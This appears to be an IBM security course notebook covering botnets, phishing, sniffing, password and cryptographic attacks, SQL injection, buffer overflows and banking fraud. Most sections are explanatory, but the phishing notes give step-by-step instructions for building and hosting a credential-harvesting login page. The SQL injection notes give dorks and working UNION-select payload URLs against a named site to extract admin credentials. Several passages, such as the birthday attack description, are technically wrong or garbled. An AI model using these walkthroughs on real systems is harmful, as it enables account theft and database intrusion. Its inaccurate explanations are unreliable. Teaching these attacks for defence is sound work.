Stage 5: Execute: In this final stage of the attack, the malicious payload has been downloaded and installed
on the victim’s system and now its job is to make the criminal behind it some money. It can do that in a
number of ways: by providing credentials, banking or credit card information that can be sold on the black
market, or by extorting the user into paying directly. Ransomware and FakeAV are both examples of malware
that extort victims into paying.
Student Notebook
IBM Power Systems
• Network Based Threat Techniques

– Botnet
• Botnet is a collection of compromised computers often referred to as “zombies”
• Botnet owners or “herders” are able to control the machines in their botnet by means of a covert
channel such as IRC (Internet Relay Chat)
• Commands are issued to perform malicious activities
Notes:
Botnet
Botnet is a collection of compromised computers often referred to as “zombies” infected with malware that
allows an attacker to control them. Botnet owners or “herders” are able to control the machines in their botnet
by means of a covert channel such as IRC (Internet Relay Chat), issuing commands to perform malicious
activities such as distributed denial-of-service (DDoS) attacks, the sending of spam mail and information
theft. The creation of botnets is comprised of five steps which has been shown in the figure given below

V10.1
Student Notebook
Uempty
IBM Power Systems
Notes:
Stages of a botnet creation has been illustrated in this slide. This process has been explained in the slide
which follow.
Student Notebook
IBM Power Systems

– Botnet
• Botnet creation is started from using vulnerabilities which are already known on a system of a
victim
• The victim’s machine is infected through various method of exploitation by the attacker after a scan
is done on the same
• This phase is known as initial infection phase. The mechanism which are used in worms, viruses,
etc. to infect the system is also used in botnet attacks
Notes:
Botnet:
Botnet creation is started from using vulnerabilities which are already known on a system of a victim. The
victim’s machine is infected through various method of exploitation by the attacker after a scan is done on the
same. This phase is known as initial infection phase. The mechanism which are used in worms, viruses, etc.
to infect the system is also used in botnet attacks. After the first phase that is initial infection, a script is
executed on the infected hosts.
The script is known as Shell code and the second phase is known as Secondary infection. The image of the
actual bot is fetched by the shell code from the specific location via HTTP, Peer-to-peer or FTP. The bot
binary attaches itself on the machine which has been target.
The victim’s computer then runs the malicious code on its own, once the bot program is installed. Every time
the computer is rebooted, the bot application starts itself automatically.
A Command and Control channel is established by the new bot after its propagation in order to communicate
with the control server. To establish communication means to join the bot with the botnet. By establishing
communication the bot is now converted into a member of the zombie army of the bot master.

V10.1
Student Notebook
Uempty The bot now receives and executes the commands which are via command and control channel by the
attacker. Many malicious activities are carried out by the bots in this phase where they are remotely controlled
by the bot master. Activities like commencing DDoS attacks and exploring other machines are conducted by
the bots.
The bots connection with the bot master is maintained continuously by themselves by the virtue of which they
keep the bot master updated about their binary codes. Detection techniques are thus avoided and new
functionally are added which help in installing bots. This is the main purpose of updating the binary codes. In
many cases, it is observed that the bots also move to other command and control channel.
The bot masters use Dynamic Domain Name System (DDNS) to keep their botnets portable and invisible.
DDNS is a resolution service. It can facilitate the regular changes and updates in the location of the server. It
helps the bot master in the cases where a command and control centre is disrupted by the authorities as they
can easily set up another command and control centre which will have the same name but a different IP
address.
Student Notebook
IBM Power Systems

– Phishing
• This threat is a form of social engineering
• There are 3 roles to be played by the phisher or the attacker in case of a phishing attack
– Send out a huge count of duplicitous emails
– Set up false websites
– Use the confidential data gained
Notes:
Phishing
This threat is a form of social engineering. In this attack, the victim is lured by the attacker (also known as
phisher in this case) by showcasing the identity of a trustworthy public platform to them and then all the
critical credentials of the victim is retrieved. There are 3 roles to be played by the phisher or the attacker in
case of a phishing attack. First is to send out a huge count of duplicitous emails through botnets or some
other medium. The second step involves the phisher setting up false websites which are hosted on a system
which is compromised. This website will prompt the victim to render their confidential and sensitive
information. Third and the last role is to use the confidential information which the user has provided to
achieve a pay-out

V10.1
Student Notebook
Uempty
IBM Power Systems
Notes:
Steps of phishing has been shown in this slide. These steps have been explained in the following slides.
Student Notebook
Threat Technique (16 of 66) IBM ICE (Innovation Centre for Education)
IBM Power Systems
• Network-based threat techniques

– Phishing
• Step: 1 Fake login page
• Step 2: Creating phishing.php file
• Step 3: Creating index.html page
• Step 4: Word action
• Step 5 Replace the link
• Step 6: Create account
• Step 7: Upload Files
• Step 8: Send the link to the victim
Figure 2-19. Threat Technique (16 of 66) DS011.0
Notes:
Step 1: Fake login page: First of all, a fake login page of any web account one wants to hack is required
Step 2: Creating phishing.php file: A PHP script is required which will collect all the form data. After
collecting the form data, the following code is copied in a text editor (notepad) and it should be saved as
phishing.php
Step 3: Creating index.html page: Go to xxxxxxx.com (without logging in), Right click anywhere in the
browser and choose view page source. Open the source code in a text editor (notepad)
Step 4: Word action: Now a new window pops-up where all the HTML code can be seen. Here there is a
need to look for word action. By pressing CRTL+F and searching for action, link like this action
https://www.xxxxxxx.com/login.php?login_attempt=1 will be found.
Step 5: Replace the link: After the above steps, the link is replaced with phishing.php like action
"phishing.php" and the page is saved as index.html (not index.html.txt).
Step 6: Create account: An account on free hosting website like YYY.com is created.

V10.1
Student Notebook
Uempty Step 7: Upload files: Now "phishing.php" & "index.html" are uploaded to the folder that was created inside
the fake website. So when uploading part is done, the link to the phisher can be
www.yourname.YYY.com/xxxxxxx/index.htm with any message like “change your FaceBook password” etc. If
anybody logs in on the fake page then their usernames and passwords are stored on the free hosting website
account in log.txt file.
Step 8: Send the link to the victim: Now the link of this fake site in sent to the victim, as soon as they login,
a file named log.txt will store in the account of free hosting website with passwords of the victim. And the fake
login page will redirect to real login page which will ask the victim to verify password
Thus, the process of phishing is concluded.
Student Notebook
IBM Power Systems

– Sniffing
• Sniffing includes decoding, interpreting, inspecting and capturing the data
• It falls in the category of passive attacks
• Various vital information is present on the TCP/IP packet that is requires by two different network
interfaces to have a communication with one another
• Fields such as destination and source IP address, port number, protocol type and sequence
numbers are contained by it
Notes:
Sniffing
Sniffing includes decoding, interpreting, inspecting and capturing the data which is present inside a network
packet on a TCP/IP network. Its main purpose is to steal information like network details, card numbers, user
IDs etc. It falls in the category of passive attacks as the attackers are silent or invisible state in the network on
which the attack is carried out. Sniffing is a very dangerous type of cyber-attack as it is very difficult to detect.
Various vital information is present on the TCP/IP packet that is requires by two different network interfaces to
have a communication with one another. Fields such as destination and source IP address, port number,
protocol type and sequence numbers are contained by it. All these fields are vital for the network layers so
that they can function especially for the layer 7. Layer 7 makes use of the data which is received. It is made
sure by the TCP/IP protocol that the packet is being constructed. It also makes sure that the packet is
mounted on the Ethernet frame and is consistently delivered to the receiver from the sender across networks.
Therefore it has to be made sure by the network layers situated above that the integrity of the information
contained by the packets is maintained

V10.1
Student Notebook
Uempty
IBM Power Systems

– Sniffing
• Sniffing attacks depend on the layer of the OSI layer targetted
• It must be remembered that sniffing attacks can be carried out at every level whether it Level 1 or 7
• Network traffic is captured by a person who is hooked to the LAN present internally
Notes:
Sniffing
To understand the purpose of the hackers to carry out a sniffing attack, it is needed to be understood that
what type of information is available on the different OSI layer. The figure below shows the information
available on different OSI layer that a hacker can steal by successfully carrying out a sniffing attack
It must be remembered that sniffing attacks can be carried out at every level whether it Level 1 or 7. Network
traffic is captured by a person who is hooked to the LAN present internally. This person ensures that there is
a physical connectivity between the layers. Packets are intercepted by the hacker who is outside the target
network by using the technique of spoofing.
This has been made easy by the use of wireless networks in the latest form of sniffing packets to penetrate a
network and get information. Packet sniffing and capturing software are used by the hackers to sniff
information. This does not depend on the location at which the hackers are. The actual purpose of the
modern packet sniffers is to troubleshoot the problems persisting in the networks but are used by the hackers
to sniff information.
Student Notebook
IBM Power Systems
Notes:
The diagram shows the different OSI layers and the type of data present at each layer.

V10.1
Student Notebook
Uempty
IBM Power Systems
Notes:
The diagram shows the ways to carry out the sniffing processes. A person (who may be an employee of the
firm) who is already hooked up to the internal LAN can run tools to directly capture network traffic. Using
spoofing techniques, a hacker outside the target network can intercept packets at the firewall level and steal
the information. In the latest form of packet sniffing, wide usage of wireless networks has made it easy to sit
near the network and penetrate it to get information.
Student Notebook
IBM Power Systems

– Sniffing
• Types of Sniffing
– A LAN sniff
– A protocol sniff
– An ARP sniff
Notes:
The section below discusses the ways in which sniffing can be carried out.
A LAN sniff: The IP range can be scanned entirely by a sniffer which deployed on an internal LAN. Further
details like open ports, live hosts etc. can be provided by this sniffer. A port specific vulnerability arises, when
a list of open ports are gathered and an attack can be carried out.
A protocol sniff: The sniffing data which is associated with the network protocols being followed are involved
in this method. Based on the data which has been captured, a protocol list is made and then it is segregated
in order to create sniffers for every breach. For example: It is assumed that an ICMP protocol is blocked if it is
not seen in the capture of a network sniff. However application details of PPP, Telnet and DNS etc. are
deciphered by a UDP sniffer after capturing the same. This process is carried out if the ICMP protocols are
seen.
An ARP sniff: The hacker captures a lot of data in this method and creates a map of IP addresses and other
MAC addresses which are associated with it. Attacks like packet-spoofing, ARP poisoning etc. can be further
created by using this map. Also it can be used to dig into vulnerabilities which are associated with the router.

V10.1
Student Notebook
Uempty
Network Based Threat Techniques (22 of 66) IBM ICE (Innovation Centre for Education)
IBM Power Systems

– Sniffing
• Types of Sniffing
– TCP session stealing
– Application-level sniffing
– Web password sniffing
Figure 2-25. Network Based Threat Techniques (22 of 66) DS011.0
Notes:
TCP session stealing: In this method, the traffic between the source and the destined IP address is captured
by a network interface working in an uninhibited mode. It is the most basic form of sniffing attack. Hackers
show interest in details like service types, port numbers, the data present and the TCP sequence numbers.
TCP sessions which are fabricated in nature can be made by the hackers after they have captured sufficient
packets. The fabricated session is used to fool the destination and source as well and take over the session
by using it as a man in the middle.
Application-level sniffing: Application details which are very intricate can be found out from the data
packets which have been captured and sniffed. This detail can be used to steal information or to create
attacks. For example: OS fingerprinting, revealing data of the TCP port associated with specific port,
analyzing SQL query analysis etc. can be performed by parsing the captured file. An attack which application
specific can be planned by creating a small list of the applications which are running on the server.
Web password sniffing: For stealing the User ID and the password associated with it, the HTTP session are
parsed and stolen in this type of attack. The attacks are carried through the internal websites which use
standard encryption which are less secured. This is done in order to dodge the SSL or Secure Socket Layers
which have been incorporated to secure the sessions of HTTP. Base64 or Base128 packets are easy to
capture. After they have been captured, a deciphering agent is run on them in order to crack the password.
Student Notebook
IBM Power Systems
• Network Based threat techniques

– Password Attack
• Traditional way of finding out the password of a computer system
• Unlimited opportunities have been created for the intruders
• These limitless openings have been created due to the internet.
• The motivation and the goal of a password hacker may differ form another but the main motive of
all of them is to gain control over a particular computer network or system
Notes:
Password attack
These attacks are the traditional way of finding out the password of a computer system and to gain access to
all the data in it. Unlimited opportunities have been created for the intruders where they can tinker with the
websites, steal secrets, abscond with the financial data etc. These limitless openings have been created due
to the internet. The motivation and the goal of a password hacker may differ form another but the main motive
of all of them is to gain control over a particular computer network or system. Therefore, it can be seen that
some of the steps which are taken by any password hacker is the same. System privileges can be built by an
intruder after interactive entry is taken or other techniques are employed. Thus, the first step to crack a
network is to find a password. Below are some common methods which are used to crack the password.

V10.1
Student Notebook
Uempty
IBM Power Systems

– Brute-Force Attack
• Brute-force attack can be used to crack any password
– Rainbow Attack
• A pre-computed list which have all the hashes for every possible character combination
– Dictionary Attack
• Commons words are used in this type of attack to identify the password of a system
Notes:
BruteForce Attack: Brute-force attack can be used to crack any password. Every possible combination of
letters, numbers or other special characters are tried in this attack. The complexity of the password
determines the duration of time, a brute force attack takes. The computer’s speed also is a determining factor
of the time taken to crack the password.
Rainbow Table: A pre-computed list which have all the hashes for every possible character combination is
called a rainbow table. It is almost similar to a dictionary attack, the only difference being that in this attack,
hashed characters are used as the passwords.
For Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string ("") is
d41d8cd98f00b204e9800998ecf8427e.
Dictionary Attack or Guessing: Commons words are used in this type of attack to identify the password of a
system. These common words may include the names of loved ones, birth dates, phone numbers, etc. A
dictionary is needed for carrying out a dictionary attack. This dictionary must be flexible enough such that the
hacker can add certain custom words and can conduct a forensics analysis. A forensic analysis is a process
in which text documents are scanned by a software and all the words of that document are added to a
dictionary. Sometimes the passwords set by the users are so simple that they can be easily guessed by the
intruder.
.
Student Notebook
Network Based Threat Techniques (25 of 66) IBM ICE (Innovation Centre for Education)
IBM Power Systems

– Intercepting the Transmission
• A successful man-in-the-middle connection is established by the attacker into the network in this
type of attack.
• Digital certificate is supposed to be sent to the browser by the server as a part of a SSL handshake
process
• The details of the process such as cipher strength, domain name, expiration date, etc. are grabbed
by the attacker by stealing the certificate
• Each request made by the browser is intercepted by the attacker from this point onwards
Figure 2-28. Network Based Threat Techniques (25 of 66) DS011.0
Notes:
Intercepting the transmission
A successful man-in-the-middle connection is established by the attacker into the network in this type of
attack. After creating this connection, the HTTPS traffic is silently watched by the attacker and it is waited for
the targeted website to respond to the request made by the HTTPS of the browser. Digital certificate is
supposed to be sent to the browser by the server as a part of a SSL handshake process. The details of the
process such as cipher strength, domain name, expiration date, etc. are grabbed by the attacker by stealing
the certificate. After stealing the certificate, a certificate of its own is created by the attacker which is also
known as a self-signed certificate. This certificate contains the same information which is present in the
certificate which has been captured. Each request made by the browser is intercepted by the attacker from
this point onwards. The attacker becomes a real man-in-the-middle and responds to every request made by
the browser by sending a fake certificate. A warning is popped up by the web-browser which is a normal
response when this kind of situation is created. But in most cases it is seen that the person browsing the
website ignores such warning and helps in making that attack successful. A separate HTTPS connection is
established by the attacker on the server site and the request is completed. The response’s result is fed back
into the web browser on the connection which has been established already. Thus the SSL traffic is in
complete control of the attacker and helps the attacker steal all the personal information. This attack is very
less likely to happen as the attack involves a real time intrusion into the network. But still if the attack takes
place it can cause a serious loss of data. It is very difficult to detect such kind of attack as the attacker is not
in the breaking request and response chain

V10.1
Student Notebook
Uempty
IBM Power Systems
• Cryptographic Threat Techniques

– The need for encryption is two-fold
– There are many threat techniques by which a cryptographic system can be broken.
– These techniques are described in the next slides
Notes:
Cryptographic Threat Techniques
The need for encryption is twofold. Firstly, encryption makes it difficult to read and use any sensitive
information that an app stores on a device. Secondly, encryption adds an additional layer of security to
sensitive information that is exchanged between apps and remote servers. There are many threat techniques
by which a cryptographic system can be broken. These techniques are described in the slides which follows
Student Notebook
IBM Power Systems

– Cryptanalysis
• Combination of computing power and sophisticated mathematical formulas can defeat any
algorithm
• There are two basic goals of a cryptanalytic attack

– To discover the plaintext
– To discover the cipher text
Notes:
Cryptanalysis
If computing power and sophisticated mathematical formulas are combined, most of the encrypting
algorithms can be defeated easily. Thus, without even knowing the key many messages can be decrypted.
Encrypted text can be even deciphered by a skilled cryptanalyst without even knowing the algorithm used to
encrypt the data. There are two basic goals of a cryptanalytic attack. First being to discover the plaintext from
ciphertext and second is discovering the ciphertext form the plaintext and then acquiring the encryption key.
Below are the attacks which are used commonly when the algorithm used for encryption is known:

V10.1
Student Notebook
Uempty
IBM Power Systems

– Cryptanalysis Known Plaintext Attack
• Known Plaintext Attack
• Chosen Plaintext Attack
• Differential Cryptanalysis
Notes:
Known Plaintext Attack: A block of plaintext and a block of cipher text corresponding to the former is in
possession of an attacker in this type of attack. The main aim is to discover the cryptographic key and also
the encryption algorithm from the known plaintext. The encryption algorithm once known, can be used for
message decryption
Chosen Plaintext Attack: In this type of attack, a cryptanalyst encrypts some chosen data blocks without
having the knowledge of which block is being encrypted. The data blocks once encrypted can then be used to
create a result which can be analyzed afterwards.
Differential Cryptanalysis: In this type of attack, many texts are encrypted simultaneously. Only almost
similar texts are chosen to be encrypted. Once encryption is done, the results evolved are compared with
each other which gives a fair pattern of the encryption key which is in use
Student Notebook
IBM Power Systems

– Cryptanalysis
• Differential Fault Analysis
• Differential Power Analysis
• Differential Timing Analysis
Notes:
Differential Fault Analysis: This attack only works on the hardware cryptographic systems. During the
working of such a system, it is subjected to various factors related to the environment like heat, radiation etc.
which coaxes the system to make mistakes during the operation of decryption or encryption. The internal
state of the device that is the algorithm can be discovered by analyzing the faults which have occurred in the
system.
Differential Power Analysis: This type of attack normally is a hardware cryptographic attack which is
particularly carried out in smart cards. The structure of the secret key inscribed in a smart card can be
discovered by observing the power of the smart card to encrypt a chosen data block. It is thus possible to
determine the key and carry out this attack.
Differential Timing Analysis: In this attack, the time taken by the smart card to perform the requested
operations of encrypting the data block is carefully monitored by the attacker. This attack is very similar to the
differential power analysis
This attack is similar to except that the attacker carefully monitors the time that the smart card takes to
perform the requested encryption operations

V10.1
Student Notebook
Uempty
IBM Power Systems

– Birthday Attack
• Based on a mathematical theory known as ‘birthday problem paradox’
• This theory states that if a set of people are selected randomly, some pair of the people will have
their birthdays on the same day
• The hash or check sum is calculated at both the ends of the data transmission and hence integrity
of data is maintained
• In birthday attack various attackers come together and capture data chunks individually
Notes:
Birthday Attack
The existence of this type of attack is based on a mathematical theory known as ‘birthday problem paradox’.
This theory states that if a set of people are selected randomly, some pair of the people will have their
birthdays on the same day. Also, as the theory depends on the number of people being chosen. Greater
number of people will ensure that the theory is more accurate. This attack targets the hash or the checksum
which is used to establish data integrity in cryptography. The hash or check sum is calculated at both the ends
of the data transmission and hence integrity of data is maintained. In birthday attack various attackers come
together and capture data chunks individually
After capturing data chunks they also share it amounts each other. The data chunk which has been captured
now programmatically analyzed in order to create additional data sets. These data sets are created in such a
way that the hash of the same matches with that of the chunk of data. It can be also said that the
mathematical algorithm is used to create a set of clone data for given data chunk and hash combination. The
encryption key is further drive with the help of the resultant data set and the original data chunk. This attack
takes a lot of time to carry out and is very complex technically, but if multiple end power systems and
programs are combined this attack is possible.
Student Notebook
Cryptographic Threat Techniques (31 of 66) IBM ICE (Innovation Centre for Education)
IBM Power Systems

– Mathematical Attack
• The plain text is taken as an input by any encryption process
• A mathematical formula is computed
• This mathematical nature of the encryption which is public key oriented is exploited by the
attackers
• There are many attacks which are general in nature used to they cover a private key
Figure 2-34. Cryptographic Threat Techniques (31 of 66) DS011.0
Notes:
Mathematical Attack
The plain text is taken as an input by any encryption process and a mathematical formula is computed. This
mathematical nature of the encryption which is public key oriented is exploited by the attackers in order to
decrypt the sent and received messages. For example: the product of two prime numbers is to be taken to
attack against a RSA. This is because the product of the prime number is an essential part of a public key of
RSA. The minimum sizes of the public key are kept much larger than the secret keys in order to account for
the speed at which these attack are carried out. Also minimum public key sizes offer comparable strength to
the RSA public key.
There are many attacks which are general in nature used to they cover a private key. Mathematical attacks
are generally applied to the individual messages only but a private key can be recovered through a brute
force attack as well. For example: The value of the victims well known private key can be founded out by the
attacker by getting the victim’s public key. The attacker can easily masquerade as the victim if the private key
is founded out..

V10.1
Student Notebook
Uempty
IBM Power Systems
• Database Threat Techniques

– Databases are one of the most compromised assets
– They have all the critical data and are thus always targeted
– Compromising database would mean getting all the critical data that an organization has
Notes:
Database Threat Techniques
Databases are one of the most compromised assets according to the 2014 Verizon Data Breach Report. The
reason databases are targeted so often is quite simple: they are at the heart of any organization, storing
customer records and other confidential business data. Below slides show some of the techniques by which
the data present in an organization’s database is targeted.
Student Notebook
IBM Power Systems

– SQL Injection
• The most famous and common method of hacking database
• The database of any website can be accessed by an unauthorized person
• All the detail of the database can be acquired by the attacker
Notes:
SQL injection
At present, the most famous and common method of hacking is carried out by SQL injections. The data base
of any website can be accessed by an unauthorized person by using this method. All the detail of the
database can be acquired by the attacker. Below are some of the base in which this type of attack can be
carried out:
- Log ins can be surpassed
- Secret data can be accessed
- Website content can be modified
- My SQL server can be shut down
Below is a diagram which shows the steps taken for a SQL injection to be carried out.

V10.1
Student Notebook
Uempty
IBM Power Systems
Notes:
The steps involved in carrying out database threat technique is shown in the figure. These steps have been
discussed in more detail in the slides to follow.
Student Notebook
IBM Power Systems

– SQL Injection
• Step 1: Finding Vulnerable Website
• Step 2: Checking the Vulnerability
• Step 3: Finding Number of Columns
• Step 4: Displaying the vulnerable Column
• Step 5: Finding Version, database and User
• Step 6: Finding the Table Name
• Step 7: Finding the Column Name
• Step 8: Finding the Admin Panel
Notes:
Step 1: Finding Vulnerable Website: The website which are vulnerable to external hacking can be found
out by using a google application known as google dork list. Google searching tricks is used by google dorks
to find out the vulnerable website. To use google dork URL is entered and for finding the vulnerability in the
website following command shown in the example is given.
For example: inurl:index.php?id=, inurl:gallery.php?id=, inurl:article.php?id=, inurl:pageid=
A list of vulnerable websites is given by the google search engine when one of the above mentioned
commands are pasted in the google search. By visiting these websites vulnerability present on the website
can be checked.
Step 2: Checking the Vulnerability: The single quote (‘) is used to check the vulnerability of the website.
This single quote is added at the URL and then it is processed. There should be no space between the last
digit of the URL and the single quote
For example: http://www.skillcube.in/index.php?id=2'
The website is not vulnerable if the new URL which has been entered directs to the same page or shows that
the page is not found. If an error which is associated with the query of SQL is shown then the website is
vulnerable.
For example: If an error is generated in the syntax of SQL which says that check the manual that corresponds
to you are my SQL version for the right syntax, then the website is vulnerable.

V10.1
Student Notebook
Uempty Step 3: Finding Number of columns: The next step involves finding the number of columns in the website’s
table. It is already known that the website is vulnerable. Now the single quote which was used earlier is
replaced by “order by n” statement. It should be watched that space is left between the order by n statement
and the number. The n which has been added should now be changed by 1, 2, 3 and so on till n. This process
is repeated until an error is generated on the website.
For example:
http://www.skillcube.in/index.php?id=2
The numbers must be changed until the error as “unknown column” is generated. If error is generated while
using the “xth” number, in that case the no of column is “x-1″, that is:
http://www.skillcube.in/index.php?id=2 order by 1(no error)
http://www.skillcube.in/index.php?id=2 order by 8(error)
Thus here, x=8, so the number of column is x-1 that is 7. Sometimes the above may not work. At the time
adding “–” at the end of the statement might work.
For example: http://www.skillcube.in/index.php?id=2 order by 1—
Step 4: Displaying the vulnerable columns: The part of the table which is vulnerable can be found if “union
select columns sequence” is used. This statement must be replaced by “order by n”. A negative value must
be used to change the ID value. Now, the sequence of the column must be replaced by numbers from 1 to
x-1, which is the number of columns. The numbers must be separated by using commas.
For example: If 7 is the number of columns then the query which will be generated is:
http://www.skillcube.in/index.php?id=-2 union select 1, 2, 3, 4, 5, 6, 7…
The below mentioned method must be tried in case the method which has been mentioned above is not
working:
http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, 3, 4, 5, 6, 7…
This order will show the numbers which are associated with the page.
Step 5: Finding version, database and user: The numeral 3 which has been generated in the query must
be replaced with “version()”.
For example: http://www.skillcube.in/index.php, id=-2 and 1=2 union select 1, 2, version (), 4, 5, 6, 7…
The version will now be shown as 4.3 or 5.0.1. In order to find the user or the database, the version () must be
replaced by user () and database () respectively.
For example:
http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, database (), 4, 5, 6, 7…
http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, user (), 4, 5, 6, 7…
Step 6: Finding the table name: The below given steps must be followed, if the version is 5 or above it:
Student Notebook
“Group_concat (table_name) must be replaced with 3 and “from information_schema.tables where

table_schema=database ()” must be added to the table
For example:
http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, group_concat (table_name),4,5,6,7 from
information_schema.tables where table_schema=database()--
Name of the table must be founded out which is associate with the user or admin
Now select the admin table. The names of the table must be guessed, if the version is 4 or the version is
something else
Step 7: Finding the column name: “Group_concat (column_name)” must now be replaced by
“group_concat (table_name). Now FROM information schema columns WHERE table_name=mysqlchar–
must be replaced by “from information_schema.tables where table_schema=database ()–”.
The My SQL CHAR () string must be used to convert the name of table. Following are the steps which has to
be taken to find the name of the column:
Install the Hack Bar add-on to find the MysqlChar() for the name of the table
First select SQL then MySQL options available in it and then go to MySQL CHAR (). A small window will be
opened where the name of table must be entered
Step 8: Finding the admin panel: In the Hack tool bar, the CHAR can be seen now which are separated by
commas
Instead of MySQL CHAR the code and the end of the URL must be copied and pasted
For example: http://www.skillcube.in/index.php?id=-2 and 1=2 union select 1, 2, group_concat
(column_name), 4, 5, 6, 7 from information_schema.columns where table_name=CHAR (97, 100, 109, 105,
110)…Now it will show the list of columns, like
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas
s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
group_concat(columnname,0x3a,anothercolumnname) must now be used to replace
group_concat(column_name). The listed name of column must also be replaced by another column name
“from table_name” must now be used to replace ” from information_schema.columns where
table_name=CHAR(97, 100, 109, 105, 110)”
Now the process will ask for entering the user name and the password associated with it. In case the website
is jock-botted by the members of the organization, the list of usernames and password can be acquired

V10.1
Student Notebook
Uempty
IBM Power Systems

– Voyager Beta Worm
• Step 1: Local IP address is grabbed
• Step 2: TCP Connection established
• Step 3: Hit and trial
• Step 4: Column creation
• Step 5: Repetition of process
Notes:
Voyager Beta Worm
The Voyager Beta worm uses default accounts and passwords to attack data servers. Below are the steps
which followed:
Step 1: Voyager Beta grabs the local IP address, changes the last octet, and replaces it with 220. For
example, if local Oracle server is 1.2.3.4, it will start with 1.2.3.220.
Step 2: It attempts to establish a TCP connection to TCP port 1521, where the Oracle connection service
listens.
Step 3: After it establishes a connection, it tries a sequence of usernames and passwords, such as
‘system’/‘manager’, ‘sys’/‘change_on_install’, ‘dbsnmp’/‘dbsnmp’, ‘outln’/‘outln’, ‘scott’/‘tiger’, ‘mdsys’/‘mdsys’,
and ‘ordcommon’/‘ordcommon’.
Step 4: If it is able to authenticate, it creates a table X with column Y. It does not appear to transfer the
payload.
Step 5: It decrements the IP address to establish new connections. If it falls below a.b.c.216 (e.g., 1.2.3.216),
the process is repeated
Student Notebook
IBM Power Systems

– Buffer overflow
• When a program attempts to put more data in a buffer
• In this case, a buffer is a sequential section of memory allocated to contain anything
• Writing outside the bounds of a block of allocated memory can corrupt data and ultimately crash
the program
Notes:
Buffer overflow
A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or
when a program attempts to put data in a memory area past a buffer. In this case, a buffer is a sequential
section of memory allocated to contain anything from a character string to an array of integers. Writing
outside the bounds of a block of allocated memory can corrupt data, crash the program, or cause the
execution of malicious code. Below diagram shows the steps taken to carry out buffer overflow

V10.1
Student Notebook
Uempty
IBM Power Systems
Notes:
The figure shows the steps involved in buffer overflow. These steps have been discussed in more detail in the
slides which follow.
Student Notebook
IBM Power Systems

– Buffer overflow
• Step 1: Entrance
• Step 2: Smashing the Stack
• Step 3: Running Commands
Notes:
Step 1: Entrance: There must be an entrance available to the hacker in order to enter a server such that he
can mess with the stack of buffer by causing an overflow or by adding commands. A Trojan horse is used for
carrying out this step as the Trojan sets up a backdoor software on the server.
Step 2: Smashing the Stack: The stack is filled up with meaning less characters and this step is carried out.
This causes the operating systems to cash under normal circumstance as it is no longer in contact of the
course which are necessary for its functions to be performed. The language command of the load machine
can also be smashed by the hacker if he wants to do more.
Step 3: Running Commands: An operating system can be commanded by the overflow of the stack buffer.
Command shell can be created by this method. For example: By using inetd in UNIX a backdoor can be
created which can be used to manipulate the session of X-windows. The hacker insert a code which works on
a same principle as does some communication software which are very popular. The control of key board,
monitor and the services of mouse can be taken over by the user if this code is used.
If a UNIX server is being attacked by creating a backdoor, the attacker will eventually succeed in carrying out
the attack. A command shell can then be run by the attacker. A program known as ‘wininet.dll’ can be created
by the attacker if the machine to be attacked runs on a window platform. Expertise and patience is required to
carry out this kind of attack as this attack highly complicated and highly technical. Knowledge of the various
languages which are used on a machine and the knowledge of c-programming are some pre-requisites to
carry out this kind of attack

V10.1
Student Notebook
Uempty
IBM Power Systems
• Banking Fraud Techniques

– There has been a significance growth in the amount of malicious applications
– Thus, a huge challenge is represented for the organizations
– Local attack and remote attack are the two attack vectors which are employed by the malicious
applications
Notes:
Banking Fraud Techniques
In the recent years there has been a significance growth in the amount of malicious applications which have
been targeting the banking transactions being done online. Thus, a huge challenge is represented for the
customers which are using these facilities and also the organizations which offer these facilities. Local attack
and remote attack are the two attack vectors which are employed by the malicious applications. In local
attack, the local computers are targeted and the victims are redirected to the remote site in case of a remote
attack. All these techniques are discussed in the section which follows.
Student Notebook
IBM Power Systems

– Local Attack
• A common mistake made by end users believes that their online banking session is perfectly safe
• Security experts continually state that everything is safe if there is a yellow padlock symbol in the
browser window
• SSL is designed as a secure tunnel from the end user computer to the bank mainframe
• This fact is exploited by the Trojan
Notes:
Local Attacks
A common mistake made by end users believes that their online banking session is perfectly safe when they
use an SSL connection. Security experts continually state that everything is safe if there is a yellow padlock
symbol in the browser window. But SSL is designed as a secure tunnel from the end user computer to the
bank mainframe and does not protect the end points such as the end user’s computer. This fact is exploited
by the Trojan. The CLSID of a Trojan is registered as a helper of the browser object in the registry. This is
done by dropping a DLL by the Trojan. Now, any information which enters into the webpage is intercepted by
the Trojan before it gets encrypted by SSL. If the Trojan is directly injected into the web browser’s memory
space, then also this functionality can be achieved. The Trojan bypasses the firewall installed on the desktop
when makes the outgoing connections. Following are some more local attack methods:
- To display a carefully crafted copy of a website on top of the official website
- To run a layered service provider (LSP) monitoring all network traffic
- To write its own network driver

V10.1
Student Notebook
Uempty
IBM Power Systems

– Remote Attack
• A server which is controlled by the attacker is used in this type of attack
• Easy to follow traces were left on the log files of the web master in the previous attacks
• But presently attackers keep the resource locally and then carry out the attack.
• This process is known as phishing where the user’s account information is acquired by social
engineering practice
Notes:
Remote Attacks
A server which is controlled by the attacker is used in this type of attack to set up a copy of the web page that
is to be impersonated. Easy to follow traces were left on the log files of the web master in the previous attacks
by the attackers as they would link directly the original images. But presently attackers keep the resource
locally and then carry out the attack. The victim is tricked into visiting the website which has been spoofed by
sending out emails through the bait servers. The victim is often prompted by the emails which are sent by the
attacker to visit the service online so that some urgent data verification can be provided by them or in order to
update some data in the main database of the provider of the service. This process is known as phishing
where the user’s account information is acquired by social engineering practice. By using exploit and some
other methods, the server’s real location is masked. For example: The quartet of an IP address can be
converted into a decimal number. To look like the domain which has been impersonated, a fake user
authentication can be added. Thus, the users are fooled in believing that they are going to land on the domain
of their service provider by clicking on the provided link. But the user goes on a different domain. More
complications has been made in the identification of URL obfuscation by the introduction of use of IDN that is
International Domain Names. IDN was announced by ICANN in the month of July of the year 2003. The main
complication in this case has been the fact that the alphabets which look similar but are of different language
can be replaced with one another and spoofing can be carried out very easily. For example: The domain
name of ‘SkillCubeBank.ltd’ can be registered by replacing the character ‘a’ of English language by character
‘a’ of the Cyrillic language. They will look identical but actually they are different. A SSL padlock can even be
added by a hacker, if a SSL which is domain-authenticated is found out.
Student Notebook
Banking Fraud Techniques (43 of 66) IBM ICE (Innovation Centre for Education)
IBM Power Systems

– Joint Forces
